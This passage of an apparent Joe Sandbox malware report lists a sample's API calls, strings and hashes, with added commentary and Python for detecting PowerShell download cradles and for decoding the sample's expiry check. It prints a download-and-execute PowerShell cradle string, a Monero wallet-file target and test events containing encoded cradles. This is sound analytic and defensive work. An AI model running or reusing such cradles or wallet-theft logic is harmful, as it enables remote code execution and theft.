                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C12D85
                  Strings
                  • ')", xrefs: 00C12CB3
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C12CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C12D04
                  • <, xrefs: 00C12D39
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 9edf8b712fe173ae415af55b3521abab1046520a95f1e080246ddba282500288
                  • Instruction ID: 04861e6f120548c5b3a61287e856a19f7720f5c5743c176fd3ed19b1f2fd6c84
                  • Opcode Fuzzy Hash: 9edf8b712fe173ae415af55b3521abab1046520a95f1e080246ddba282500288
                  • Instruction Fuzzy Hash: F741EA718112089AEB14EBA1D992FEDBB74AF11310F504029E016A61D2EF746ACAFF91
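The command line assembled by this routine, powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')", is the classic PowerShell download cradle behind the "Yara detected Powershell download and execute" signature: the script is fetched over the network and fed straight to Invoke-Expression, so nothing touches disk. The hardcoded SysWOW64 path is also telling: the 32-bit sample launches the 32-bit PowerShell host, so on a 64-bit machine the child's image path alone separates it from an administrator's shell. The example below is an added detection, not code from the report or from the sample: it scans constructed Sysmon-style process-creation events for the fetch-plus-execute pair, decodes an -EncodedCommand payload so the same cradle cannot hide behind base64, and pulls out the staged URL. The sample events, the example.invalid URLs and the field names are constructed for the demonstration.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed Sysmon-style (Event ID 1) process-creation events; not taken from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the shape seen in the report: a 32-bit dropper spawning the SysWOW64 PowerShell host
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -c \"iex(New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/stage2.ps1')\"",
    },
    {   # benign: runs a script from disk, no network fetch, no in-memory execute
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    },
    {   # the same cradle hidden behind -EncodedCommand (base64 of UTF-16LE)
        "ParentImage": r"C:\Users\user\AppData\Local\Temp\dropper.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -enc " + base64.b64encode(
            "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
            .encode("utf-16-le")).decode(),
    },
]

# Indicator regexes; PowerShell is case-insensitive, so the scan is too.
CRADLE_INDICATORS = [
    ("noprofile",     re.compile(r"(?i)(?<!\S)-no(p|profile)\b")),
    ("hidden_window", re.compile(r"(?i)(?<!\S)-w(indowstyle)?\s+hidden\b")),
    ("invoke_expr",   re.compile(r"(?i)\b(iex|invoke-expression)\b")),
    ("webclient",     re.compile(r"(?i)new-object\s+(system\.)?net\.webclient")),
    ("download",      re.compile(r"(?i)\.download(string|file|data)\s*\(|invoke-webrequest|(?<![\w-])(iwr|curl|wget)\b")),
]
DOWNLOAD_NAMES = {"webclient", "download"}
EXEC_NAMES = {"invoke_expr"}

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_ARG = re.compile(r"(?i)(?<!\S)-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
URL_IN_CALL = re.compile(r"(?i)download(string|file|data)\s*\(\s*['\"]([^'\"]+)['\"]")


@dataclass
class CradleAlert:
    image: str
    parent: str
    indicators: List[str] = field(default_factory=list)
    decoded_command: Optional[str] = None
    url: Optional[str] = None
    wow64: bool = False          # 32-bit host launched on 64-bit Windows (SysWOW64 path)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the UTF-16LE script behind -EncodedCommand, or None if absent or not valid base64."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:          # binascii.Error is a ValueError
        return None


def analyse_command_line(cmdline: str) -> Tuple[List[str], Optional[str], Optional[str]]:
    """Scan the visible command line and, when present, the decoded payload; return (indicators, decoded, url)."""
    decoded = decode_encoded_command(cmdline)
    hits: List[str] = []
    url: Optional[str] = None
    for text in [cmdline] + ([decoded] if decoded else []):
        for name, rx in CRADLE_INDICATORS:
            if name not in hits and rx.search(text):
                hits.append(name)
        m = URL_IN_CALL.search(text)
        if m and url is None:
            url = m.group(2)
    if decoded is not None:
        hits.append("encoded_command")
    return hits, decoded, url


def is_download_cradle(indicators: List[str]) -> bool:
    """A cradle is the pair: fetch over the network AND execute the result in memory. Either alone is noise."""
    found = set(indicators)
    return bool(found & DOWNLOAD_NAMES) and bool(found & EXEC_NAMES)


def detect_cradles(events: List[Dict[str, str]]) -> List[CradleAlert]:
    alerts: List[CradleAlert] = []
    for ev in events:
        image = ev.get("Image", "")
        if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        hits, decoded, url = analyse_command_line(ev.get("CommandLine", ""))
        if not is_download_cradle(hits):
            continue
        alerts.append(CradleAlert(image=image, parent=ev.get("ParentImage", ""), indicators=hits,
                                  decoded_command=decoded, url=url,
                                  wow64="\\syswow64\\" in image.lower()))
    return alerts


if __name__ == "__main__":
    for a in detect_cradles(SAMPLE_EVENTS):
        print(f"{a.parent} -> {a.image} wow64={a.wow64} {a.indicators} url={a.url}")
```

The rule fires only on the fetch-and-execute pair, so -nop or a hidden window by itself stays a context field rather than an alert; the parent image (here a user-writable path) and the wow64 flag are what you would pivot on next. Over a real event stream, feed detect_cradles the same three fields from your EDR or Sysmon export.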
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00C09F41
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 0bdef3c5272be30f0874ff4a6e18a95213914f1138e6827eff8f670053b6e034
                  • Instruction ID: 1cbb075b125f1779658a78ce6323737f6af64db65902349a49e1628fb4ef063a
                  • Opcode Fuzzy Hash: 0bdef3c5272be30f0874ff4a6e18a95213914f1138e6827eff8f670053b6e034
                  • Instruction Fuzzy Hash: A3615B70A00208EFDB24EFA4DC96BED7775AF45304F048018F90A5F1D2EB706A46EB92
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 00C1696C
                  • sscanf.NTDLL ref: 00C16999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C169B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C169C0
                  • ExitProcess.KERNEL32 ref: 00C169DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 9d7929c83a31f3d1f273271652faf2772ee72bd59c411e2fd881291fc2737d86
                  • Instruction ID: 515ebe12387c47dd850e6b513e8c5d0c7bbeba29a337cf2edaf7207f0162078d
                  • Opcode Fuzzy Hash: 9d7929c83a31f3d1f273271652faf2772ee72bd59c411e2fd881291fc2737d86
                  • Instruction Fuzzy Hash: 1321EA75D04208AFDF08EFE4D9499EEB7B5FF49300F04852AE416B3250EB345609DB65
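GetSystemTime, then sscanf, then two SystemTimeToFileTime calls, then ExitProcess is the shape of a build-expiry check: an embedded date string is parsed into a SYSTEMTIME, both that and the current UTC time are converted to 64-bit FILETIME values (100-nanosecond ticks since 1601-01-01) so they compare as plain integers, and the process exits when the clock is past the embedded date. The example below is added, not the sample's code: it performs the same comparison with the FILETIME conversion written out, plus the inverse, so a FILETIME constant pulled from a dump can be turned back into a date. The YYYY-MM-DD layout of the string and the strict "now > expiry" sense of the branch are assumptions; the report shows the API sequence, not the sscanf format or the comparison direction.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Optional

# SystemTimeToFileTime counts 100-nanosecond intervals since this instant (UTC).
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000
TICKS_PER_DAY = 86_400 * TICKS_PER_SECOND

# Assumed layout of the embedded expiry string; the report does not show the sscanf format.
EXPIRY_RE = re.compile(r"^\s*(\d{4})-(\d{1,2})-(\d{1,2})\s*$")


def at_utc(year: int, month: int, day: int, hour: int = 0, minute: int = 0) -> datetime:
    """Build an aware UTC datetime, the Python stand-in for a SYSTEMTIME from GetSystemTime."""
    return datetime(year, month, day, hour, minute, tzinfo=timezone.utc)


def systemtime_to_filetime(dt: datetime) -> int:
    """Mirror SystemTimeToFileTime: 64-bit count of 100 ns ticks since 1601-01-01 UTC."""
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86_400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def filetime_to_datetime(ft: int) -> datetime:
    """Inverse of the above: turn a FILETIME constant found in a dump back into a date."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_expiry(expiry: str) -> datetime:
    """Stand-in for the sscanf call: split the embedded string into year/month/day (midnight UTC)."""
    m = EXPIRY_RE.match(expiry)
    if not m:
        raise ValueError(f"expiry string not in YYYY-MM-DD form: {expiry!r}")
    year, month, day = (int(g) for g in m.groups())
    return at_utc(year, month, day)


def is_expired(expiry: str, now: Optional[datetime] = None) -> bool:
    """True when the current FILETIME is past the embedded one, i.e. the path that reaches ExitProcess."""
    now = now if now is not None else datetime.now(timezone.utc)
    return systemtime_to_filetime(now) > systemtime_to_filetime(parse_expiry(expiry))


def days_until_expiry(expiry: str, now: Optional[datetime] = None) -> int:
    """Whole days left before the sample would stop running; negative once it has expired."""
    now = now if now is not None else datetime.now(timezone.utc)
    ticks = systemtime_to_filetime(parse_expiry(expiry)) - systemtime_to_filetime(now)
    return ticks // TICKS_PER_DAY


if __name__ == "__main__":
    # Constructed expiry string, not a value taken from the sample.
    embedded = "2024-10-13"
    print("expired now:", is_expired(embedded), "days left:", days_until_expiry(embedded))
    print("0x01A0A0C4E0000000 ->", filetime_to_datetime(systemtime_to_filetime(parse_expiry(embedded))))
```

Because the check reads the real-time clock, a detonation whose clock is behind the embedded date never reaches ExitProcess, and one ahead of it shows nothing but an immediate clean exit; days_until_expiry tells you which side of that line the sandbox sat on, and filetime_to_datetime recovers the date when only the 64-bit constant is visible in memory.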
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C17E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,0178C3E8,00000000,00020119,?), ref: 00C17E5E
                  • RegQueryValueExA.ADVAPI32(?,0179DC60,00000000,00000000,000000FF,000000FF), ref: 00C17E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00C17E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 1ec1c4f94891c0c4ef7b297c4ea6636c8d8d801df185e3b097e45093a3b5cd9f
                  • Instruction ID: dbe3db6597f86973da2149d1e892942129b972fa2de7133a3f14e8cea09ff90e
                  • Opcode Fuzzy Hash: 1ec1c4f94891c0c4ef7b297c4ea6636c8d8d801df185e3b097e45093a3b5cd9f
                  • Instruction Fuzzy Hash: 9A1191B5A84205EFD714CF96DC49FBBBBB8EB09710F104229F615A7280D77458059BA1
                  APIs
                  • StrStrA.SHLWAPI(0179E868,?,?,?,00C1140C,?,0179E868,00000000), ref: 00C1926C
                  • lstrcpyn.KERNEL32(00E4AB88,0179E868,0179E868,?,00C1140C,?,0179E868), ref: 00C19290
                  • lstrlen.KERNEL32(?,?,00C1140C,?,0179E868), ref: 00C192A7
                  • wsprintfA.USER32 ref: 00C192C7
                  Strings
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 439b94f8720b6b6e9059d20ed3b2ab05af0b9f9d6779bf9fc68c482fdb7c49e8
                  • Instruction ID: 595d8ad215dd53df19a083e269d5ec36e1601a6aa33e4e60e6d1a3c20512a49d
                  • Opcode Fuzzy Hash: 439b94f8720b6b6e9059d20ed3b2ab05af0b9f9d6779bf9fc68c482fdb7c49e8
                  • Instruction Fuzzy Hash: DD012175940208FFCB04DFECD998EAE7BB9EF49364F148158F909AB300C631AA41DB91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C012B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C012BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C012D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C012F5
                  • RegCloseKey.ADVAPI32(?), ref: 00C012FF
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 25c987714010c5f44827efbef25450c01b53516e1ca93c8708e47adbd49b6afe
                  • Instruction ID: 4b3622533d9d6d38c37686883128bde145fe37f84e1c383ef1441dfa457584d1
                  • Opcode Fuzzy Hash: 25c987714010c5f44827efbef25450c01b53516e1ca93c8708e47adbd49b6afe
                  • Instruction Fuzzy Hash: CD011DB9A40208BFDB14DFE1DC49FAEB7B8EB48711F048169FA05A7280D6749A058F51
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C16663
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C16726
                  • ExitProcess.KERNEL32 ref: 00C16755
                  Strings
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 9d434f057fc8e35b237be8ba217d9b974e645485c6bf37e903530afa653fb1f8
                  • Instruction ID: aab9cea96a916564d6976e680f1bbf767df8b8d4fd7d6aaa0321a624919b7452
                  • Opcode Fuzzy Hash: 9d434f057fc8e35b237be8ba217d9b974e645485c6bf37e903530afa653fb1f8
                  • Instruction Fuzzy Hash: 303138B1C01208AADB14EB90DD86FDEB778AF05310F404199F20976191DF746B89EF6A
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C20E28,00000000,?), ref: 00C1882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C18836
                  • wsprintfA.USER32 ref: 00C18850
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: ddb1d40015ca67fe3ab163de97fbd24f2f85fdd6b320894ffbb403e67a356493
                  • Instruction ID: 49df9378c0f36f834d23494cd7e04b92a86aa54abfef644d3178dbfb5911f32e
                  • Opcode Fuzzy Hash: ddb1d40015ca67fe3ab163de97fbd24f2f85fdd6b320894ffbb403e67a356493
                  • Instruction Fuzzy Hash: 3A216DB5A80208AFDB04DF95DD49FAEBBB8FB49710F144129F605B7280C779A9058BA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C1951E,00000000), ref: 00C18D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C18D62
                  • wsprintfW.USER32 ref: 00C18D78
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 8f6682c61a37085d4e0b7fbf9715c88a39d440ee0855285c03da2c9a1338af75
                  • Instruction ID: 9bcfe35c57a4ff45daa5839f60a9b8e36983f7afc37baf8cc25ae5d38b2ceef8
                  • Opcode Fuzzy Hash: 8f6682c61a37085d4e0b7fbf9715c88a39d440ee0855285c03da2c9a1338af75
                  • Instruction Fuzzy Hash: 87E08674A80208BFC714DB95DC0EE5977B8EB09711F040065FD0997280D9715E058B52
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C0A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 00C0A3FF
                  • lstrlen.KERNEL32(00000000), ref: 00C0A6BC
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 00C0A743
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 2c74c44c7b5ed548d0df6150b769012150fa66693a3c0bd8fd7f6a9adf8d5a61
                  • Instruction ID: 2488c3803bcee709529185461dd1720d2ab14bec2f1c89e549186ab16c06f0c9
                  • Opcode Fuzzy Hash: 2c74c44c7b5ed548d0df6150b769012150fa66693a3c0bd8fd7f6a9adf8d5a61
                  • Instruction Fuzzy Hash: FCE10B728111189BDB05FBA4DD92EEE7338AF15310F548169F516B20D1EF306A8EFB62
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C0D481
                  • lstrlen.KERNEL32(00000000), ref: 00C0D698
                  • lstrlen.KERNEL32(00000000), ref: 00C0D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 00C0D72B
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: a6866907f257a58c657218e2791819423906bb46ddc7cea82a0592c6436fd7b4
                  • Instruction ID: 608dff1abf807d88c4ca2265dcc377c5e3856e7c0d50e30468533f62a2013c43
                  • Opcode Fuzzy Hash: a6866907f257a58c657218e2791819423906bb46ddc7cea82a0592c6436fd7b4
                  • Instruction Fuzzy Hash: 639141728111089BDB04FBA0DD96EEE7338AF15310F544169F517B60D1EF346A8AFBA2
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C0D801
                  • lstrlen.KERNEL32(00000000), ref: 00C0D99F
                  • lstrlen.KERNEL32(00000000), ref: 00C0D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 00C0DA32
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 9341a8f57bb487cc50196f07895107a0ccffcaf59292aa3c43d0be11912587e4
                  • Instruction ID: 3395a8f6aacdae25da20ab1f7c2489eaf618a2c0eed14afa41c8ac9b561b3eb4
                  • Opcode Fuzzy Hash: 9341a8f57bb487cc50196f07895107a0ccffcaf59292aa3c43d0be11912587e4
